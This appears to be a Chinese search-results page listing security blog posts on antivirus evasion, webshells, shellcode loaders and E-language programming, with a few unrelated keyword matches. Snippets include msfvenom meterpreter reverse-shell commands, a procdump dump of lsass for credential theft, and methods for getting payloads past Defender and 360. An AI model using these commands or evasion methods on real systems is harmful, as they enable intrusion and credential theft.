易语言免杀第13页

vulntarget-a靶场的学习思考

前言：最近玩了一下crow大表哥的靶场，觉得靶场打过之后确实是能用到很多技巧和知识，所以在这里做一些个人的学习总结，文章和靶场适合新人，因为不用做免杀，也可以让人初步的了解一下域环境靶场由星期五实验室与乌鸦安全共同维护

vlan911·2022-03-23 21:34

数据包中的加密之RC4加密介绍

在一次偶然间对GitHub上找的免杀马代码学习的时候才认识了这个加密方式，在这个行业之间人与人的差距不是一点半点。介绍：RC4算法的特点是算法简单，执行速度快。

你可以叫我风平·2022-03-23 10:24

Python安全开发——多线程Fuzz&Waf 异或免杀&爆破

1.概述：知识点：协议模块使用，Request爬虫技术，简易多线程技术，编码技术，Bypass后门技术目的：掌握利用强大的模块实现各种协议连接操作(爆破或利用等)，配合Fuzz吊打WAF等2.简单多线程技术、FTP模块实现协议爆破脚本：queue，threading模块使用、ftplib模块使用：遍历用户及密码字典、尝试连接执行命令判断ftp模块使用：https://www.cnblogs.com

暮w光·2022-03-09 05:46

Jsp Webshell 免杀-命令执行

在经过java基础学习之后，尝试对java命令执行的webshell进行免杀处理。命令执行在之前的Java命令执行中学习了执行系统命令的几个类。这次我们还是以经典的Runtime类来测试。")

CSeroad·2022-03-07 10:30

Jsp Webshell 免杀-类加载器

前言在经过java类加载器的学习，我们对webshell的免杀处理就可以更进一步。自定义类加载器-命令执行对于如何自定义类加载的详细过程，可参考Java类加载器学习。这里就不多阐述了。

CSeroad·2022-02-17 15:12

记一则免杀技巧

CobaltStrike+Metasploit联动里提到了CS与MSF联动的场景类似这种后渗透环境中，我一直在琢磨怎样才能神不知鬼不觉地执行一个meterpreter这种功能强大的Payload网上关于免杀和隐蔽执行的思路与技巧有很多

慕长风啊·2022-02-14 11:38

易语言win10写文件到c盘,Win10电脑怎么转移c盘文件？

每台电脑在装系统的时候系统盘都是默认存放在C盘的，但是很多软件下载保存或者储存文件通常情况下也都是会被默认在C盘底下的，如果是电脑小白用户的话必定都是默认选择的，久而久之，就会导致C盘空间不足，影响计算机的正常使用和运行。其实除了日常的清理垃圾释放内存，还可以将C盘的可移动文件迁移到其他分区的，这样C盘的空间才能足够大，不会经常被提示空间不足，下面小编就来介绍一下win10电脑怎么转移c盘文件的相

李叫瘦·2022-02-09 22:01

刚工作，不知道怎么变得专业

今天特么可贼热，我QQ上又来了一个想搞暧昧的寂寞人，我拒绝了一次，哎，又给我来了第二次，可是特么这样都能撩动我，可见人性是多么软弱，理智是多么脆弱，我活了20年，就是跟人性斗争的血泪史，他让我避免杀身之祸

三个么么哒·2022-02-09 14:39

易语言操作mysql数据库

有勇气的牛排原文地址：https://www.920vip.net/article/69连接数据库失败返回0数据库句柄＝连接MySql(“127.0.0.1”,“用户名”,“密码”,“数据库名”,3306)调试输出(数据库句柄)增加数据SQL＝取文本(“insertintoEuservalues('%s','%s');”,“1666”,“2666”).版本2.支持库mysql.支持库spec.程序

云间来客科技·2022-02-08 10:44

易语言基础代码

原文地址：https://www.920vip.net/article/72易语言基础代码文本操作日期＝[2020年1月2日]调试输出(日期)句子＝“人生若只如初见，何事秋风悲画扇。”

云间来客科技·2022-02-08 10:44

webshell之jsp免杀

webshell之jsp免杀转载自webshell免杀研究原理向服务器端发送恶意代码写成的文件(即：shell)，客户端通过远程连接，利用shell连接到服务器，并可对服务器进行操作。

tomyyyyy·2022-02-05 21:06

weevely的使用及免杀（Linux中的菜刀）

本专栏是笔者的网络安全学习笔记，一面分享，同时作为笔记前文链接WAMP/DVWA/sqli-labs搭建burpsuite工具抓包及Intruder暴力破解的使用目录扫描，请求重发，漏洞扫描等工具的使用网站信息收集及nmap的下载使用SQL注入(1)——了解成因和手工注入方法SQL注入(2)——各种注入SQL注入(3)——SQLMAPSQL注入(4)——实战SQL注入拿webshellVulnhu

漫路在线·2022-02-04 16:05

【免杀技术】Tomcat内存马-Filter

Tomcat内存马-Filter型什么是内存马？为什么要有内存马？什么又是Filter型内存马？这些问题在此就不做赘述Filter加载流程分析tomcat启动后正常情况下对于Filter的处理过程：加载web.xml配置文件读取filter的信息，并将其保存在context对象里的filterDef,filterConfigs,filterMappers中filterChain的构造流程:1.匹配

Aurora-M·2022-02-04 15:00

VC++源码免杀教程 286合购网ghost免杀教程

网络攻防技术中的免杀技术是十分有趣的,尤其要说ghostvc++源码免杀,过掉国内的杀毒软件,达到不损坏功能,正常上线,从而无视杀软的存在.免杀之网络攻防入门书籍推荐1.杀不死的秘密-反汇编揭露黑客免杀变种技术

玩弄你们·2022-02-03 06:16

内网渗透-免杀抓取windows hash

前言内网渗透时，获得主机管理员权限后，通常会抓取用户的明文密码或hash，进行pth攻击。大部分情况会遇到防护软件，常规抓取方法失效，因此需要对防护进行绕过。Procdump.exeProcdump是微软官方发布的工具，使用该工具可以把lsass的内存dump下来，可以绕过大多数的防护软件。首先使用procdump.exe把进程lsass.exe的内存dump下来procdump.exe-acce

Tide_诺言·2022-02-02 22:05

Python免杀木马轻松过Defender，秒杀36和火

测试环境联网的Win10，开启了Defender最新的火绒和360杀毒Defender肯定要取消上传可疑文件的！测试步骤这里使用CS生成python类型的木马文件，并对生成的shellcode进行Base64编码和HEX编码，将编码后的shellcode分成几个文件存放，再去请求下载并解码，最后将解码后的shellcode加载到内存中。编译成EXE，顺便使用upx压缩下：开启Defender的Wi

LMcream·2022-01-27 09:21

在C++中使用HP-Socket

HP-Socket是一套通用的高性能TCP/UDP/HTTP通信框架，包含服务端组件、客户端组件和Agent组件，广泛适用于各种不同应用场景的TCP/UDP/HTTP通信系统，提供C/C++、C#、Delphi、E（易语言

·2021-12-08 19:20

红队远控免杀初探

免杀初探自己一直是研究wb安全方向比较多，对红队远控免杀的认知基本没有，一直是听着大哥们说，却一直没有静下心来系统性的学习过，这里记录下免杀的学习记录。

CKCsec·2021-12-02 14:46

Assassin暗杀者-自用短小精悍的webshell管理工具分享

自用工具开源互相学习，工具短小精悍，生成的webshell能够过目前主流杀毒软件(36x、腾x等，目前能过，后面可能很快就不行了，需要稍微变换webshell代码以再次免杀)连接后交互的流量特征几乎没有

b1ackc4t·2021-11-23 21:00

C++中简单使用HP-Socket

HP-Socket是一套通用的高性能TCP/UDP/HTTP通信框架，包含服务端组件、客户端组件和Agent组件，广泛适用于各种不同应用场景的TCP/UDP/HTTP通信系统，提供C/C++、C#、Delphi、E（易语言

time-flies·2021-11-11 22:00

windows命令混淆

最近有些朋友问我一些免杀问题，由于个人技术有限，对静态免杀有些了解（动态免杀真的不会，太菜了），所以就总结了一些Windows中cmd的命令混淆思路，静态免杀无非就是对安全设备检测到代码（命令）中的特征字符进行查杀

·2021-11-10 17:19

易语言编程新手第一课安装及运行

目录易语言安装环境使用易语言编译一个简单的易语言易语言安装环境要学习易语言那么首先要有编译环境，以下是易语言的下载地址注释：此平台要六百多元购买正版http://www.dywt.com.cn/也可以下载破解版但是我不推荐

·2021-11-10 11:16

易语言编程入门第一个程序

目录易语言的优点：最早接触易语言是三年前的事情了，那时候是因为DNF这个游戏我才知道了易语言这个编程语言，当时对他就非常的憧憬。

·2021-11-10 11:12

易语言编程命令调用操作大全

目录一、命令概述二、命令的格式三、命令的参数四、命令的返回值五、命令嵌套调用六、数组参数与数组返回值七、流程控制类命令八、算术运算命令九、逻辑比较十、位运算命令十一、数组操作命令十二、环境存取命令十三、拼音处理命令十四、文本操作命令十五、时间操作命令十六、数值转换命令十八、磁盘操作命令二十、系统处理命令二十一、媒体播放命令二十二、网络通信命令二十三、其他命令二十四、我的播放器第三代（改）一、命令概

·2021-11-10 11:11

易语言编程基础数据类型变量及子程序

目录一、易语言的数据类型基本数据类型分为：基本数据类型中的数值类型有包含了：程序：数据类型转换特殊数据类型通用型数据类型：库定义数据类型：自定义数据类型：内部组件数据类型：二、易语言中的变量三、易语言的资源表四

·2021-11-10 11:09

【Web安全】JSP内存马研究

前言最近在研究webshell免杀的问题，到了内存马免杀部分发现传统的Filter或者Servlet查杀手段比较多，不太容易实现免杀，比如有些工具会将所有注册的Servlet和Filter拿出来，排查人员仔细一点还是会被查出来的

IT老涵·2021-10-19 16:08

Metasploit 实现木马生成、捆绑及免杀

木马的捆绑在社会工程学中是我们经常使用的手段，而为了躲避杀毒软件的查杀，我们又不得不对木马进行免杀处理。

·2021-10-08 14:06

渗透测试-木马免杀的几种方式

前言免杀，又叫免杀毒技术，是反病毒，反间谍的对立面，是一种能使病毒或木马免于被杀毒软件查杀的软件。它除了使病毒木马免于被查杀外，还可以扩增病毒木马的功能，改变病毒木马的行为。

白面安全猿·2021-09-28 21:25

《水浒传》专题探究之英雄辨析（二）

结识英雄过渡语：有人说，这些梁山好汉中，有些人不是“真英雄”，如宋江怕李逵造反，在临死前为了保住自己的虚名，竟然毒死自己肝胆相照的好兄弟，不是英雄所为；武松在血洗鸳鸯楼时，杀死张都监家眷和仆人十几人，不免杀心过重

一一真·2021-09-23 03:38

PC企业微信HOOK接口开源

你可以通过扩展企微助手VXApi来实现：监控或收集企业微信消息自动消息推送聊天机器人通过企业微信远程控制你的设备目前测试可以使用语言有C/C++，C#，易语言，Python,Java,Go,NodeJs

观企中国·2021-09-16 14:35

【历史上的今天】9 月 16 日：乔布斯的归来；苹果崛起；易语言发布

整理|王启隆透过「历史上的今天」，从过去看未来，从现在亦可以改变未来。今天是2021年9月16日，“历史上的今天”栏目正式上线一个月。去年的今天，库克在美国举行苹果秋季发布会，宣布了全新的iPad和AppleWatch以及iPhone12的跳票；而在昨天，9月15日，众所周知iPhone13来了，苹果这一热门话题再度霸占我们的视野，朋友圈和微博都在为此刷屏。事实上，9月16日对于苹果公司是个十分具

历史上的今天·2021-09-16 10:35

红队培训班作业 | 五种免杀bypass火绒360姿势横向测评：哪款更适合你？

文章来源｜MS08067红队培训班第12节课作业本文作者：某学员A（红队培训班1期学员）按老师要求尝试完成布置的作业如下：一、远程线程注入（一）通过MSF生成payload通过msfvenom生成payload，命令如下：msfvenom-pwindows/meterpreter/reverse_tcplhost=192.168.61.103lport=4444-ex86/shikata_ga_n

Ms08067安全实验室·2021-09-01 07:00

Python调用易语言动态链接库实现验证码功能

今天成功把易语言调用验证码通杀的DLL在Python中成功调用了特此共享出来，下面是识别截图：识别方法1："""当然在学习Python的道路上肯定会困难，没有好的学习资料，怎么去学习呢？

·2021-08-18 17:42

红队培训班作业 | 免杀过360和火绒四种方法大对比

MS08067红队培训班第12节课作业本文作者：汤浩荡（红队培训班1期学员）按老师要求尝试完成布置的作业如下：环境准备：Kalilinux安装cs4.2，Windows7系统安装火绒杀毒和360杀毒，为测试免杀并且防止联网查杀

Ms08067安全实验室·2021-08-16 07:00

小邵教你玩转nodejs之nodejs概念、事件环机制（1）

前言：大家好，我叫邵威儒，大家都喜欢喊我小邵，学的金融专业却凭借兴趣爱好入了程序猿的坑，从大学买的第一本vb和自学vb，我就与编程结下不解之缘，随后自学易语言写游戏辅助、交易软件，至今进入了前端领域，看到不少朋友都写文章分享

iamswr·2021-06-21 15:01

小程序素材抓取软件，可抓取小程序、网页、APP等素材

为什么要写这个软件最开始应该是去年吧，我花钱买了这样一个软件，那是还挺便宜，没多想就入手了，今年软件到期之后，我要续费，价格是198/年，作为第一批用户没有任何优惠，然后我就看了下这个软件的实现原理，找相关的关键词，最终确认这是一款由易语言编写的软件

橘长呀·2021-06-12 09:04

后渗透免杀返回shell教程

一天一个入狱小技巧,教程地址:https://www.bilibili.com/video/BV1xa4y1p7Kr

表弟_十七·2021-06-08 20:34

2020-01-23--觅风易语言1-43集--学习笔记

第三集--最简单的计算器image.png两个知识点：01，组合框.现行选中项的用法。从0开始，02，四舍五入（），除法之类的。第四集--模仿loading效果image.png第一个知识点：01，计次循环首---第二个参数可以为空，我才知道。02，载入（）命令，第三个参数的真，假问题，决定什么，值得重视。03，编辑框.加入文本命令。这个用的不多，这里涉及到了。第五集--超文本浏览框的简单例子im

heiqimingren·2021-06-06 19:02

无力吐槽的命运

话说过年家家户户不免杀鸡杀鸭的，一邻居抱怨说：哎呀，今早就要杀了，结果忘记了，还喂了一肚子饱饱的。我九十岁的爷爷接话了：过去犯人要砍头的时候还得给一顿饱，你就多喂一把谷子又算得了什么。

不思九八·2021-06-05 13:13

powershell加密、压缩免杀实战

结合"PowerShellcrypter"工具(下面用简称"crypter")来对powershell脚本进行加密并采用Gzip/DEFLATE来绕过杀软1、msfvenom生成powershell反弹马msfvenom-pwindows/x64/meterpreter_reverse_tcpLHOST=192.168.81.253LPORT=5555-fpsh-reflection>hacksh

城市烈人·2021-06-04 14:22

探索跟盈利矛盾

新证明新数据，容错，不很确定的，隐藏免杀的走两步，共存，但总的仍掌控。大数据动轨迹。仍在我的掌控下，动，所以为监控。有限的资源开发监控非常不

gbaidu2009_·2021-05-28 07:46

python免杀技术---复现+改进----1

0x01复现复现文章：https://mp.weixin.qq.com/s?__biz=MzI3MzUwMTQwNg==&mid=2247484733&idx=2&sn=5b8f439c2998ce089eb44541d2da7a15&chksm=eb231%E2%80%A6首先用cobaltstruke生成一个python的payload脚本然后复制里面的payload进行Base64编码：加密

go0dStudy·2021-05-22 20:44

python免杀技术---shellcode的加载与执行

0x01生成shellcode首先通过下列命令生成一个shellcode，使用msfvenom-p选项来指定paylaod，这里选用windows/x64、exec模块接收的参数。使用calc.exe执行弹出计算器的操作。-f选项用来执行生成的shellcdoe的编译语言。msfvenom-pwindows/x64/execCMD='calc.exe'-fpy0x02加载与执行shellcode的

go0dStudy·2021-05-22 15:07

使用Metasploit对Windows系统渗透测试——加壳免杀花指令

文章目录前言一、准备工作1.生成被控端攻击载荷2.生成主控端handler二、获取winxp的shell三、获取win7的shell四、获取win10的shell1.免杀+捆绑2.加壳+压缩3.花指令4

我重来不说话·2021-05-21 21:51

开服器的选择

网络上许多开服器都是使用易语言制作的，但是易语言对于开发者的要求较小，甚至一个高中生都可以掌握并使用易语言进行开发，并且程序并不比一些专业程序员开发的差。

兄弟们GO·2021-05-20 19:05

关于基于中文伪代码的编程语言的设想

那时候甚至已经有成熟的实现，最有名的是易语言。虽然它由于各种原因（比如被很多人拿去写外挂写病毒、收费、从语言形式上看像是套壳的已有语言）被人诟病，但是就生态、难易程度上来说，还是可圈可点的。

阿啊阿吖丁·2021-05-19 14:12

WAF绕过--小马绕过

WAF绕过之小马免杀WAF：安全狗-Apache版v4正常的PHP一句话木马：对于这个正常的一句话木马，安全狗会拦截。关于拦截其实最主要的还是测试，看看Waf究竟怎么拦截。

wwxxee·2021-05-17 22:22

我想我们在这里会好好的

因为去超市买东西，玛蒂达才得以避免杀生之祸，她径直走向里昂的房间，急促的敲门。并用颤抖恳求的声音说道，请开门！里昂虽有所犹豫终究还是打开了那扇关乎玛蒂达生死

夏天丫头·2021-05-08 13:15

exe自动管理员模式运行

到该软件并添加资源Paste_Image.pngPaste_Image.png3.右键界面->1导入的1.txt文件Paste_Image.png补充1.txt(直接复制即可)*方法二：（推荐）直接在易语言中修改配置

小小机器人·2021-05-07 15:31

14 种编程语言书写关机脚本，真香

文章目录批处理版本C语言版本C++语言版本JAVA语言版本C#语言版本Python语言版本NodeJS语言版本PHP语言版本Perl语言版本Go语言版本VB语言版本SQL语言版本树莓派版本易语言版本期待评论区五一到了

梦想橡皮擦·2021-05-07 11:10

推荐频道

易语言免杀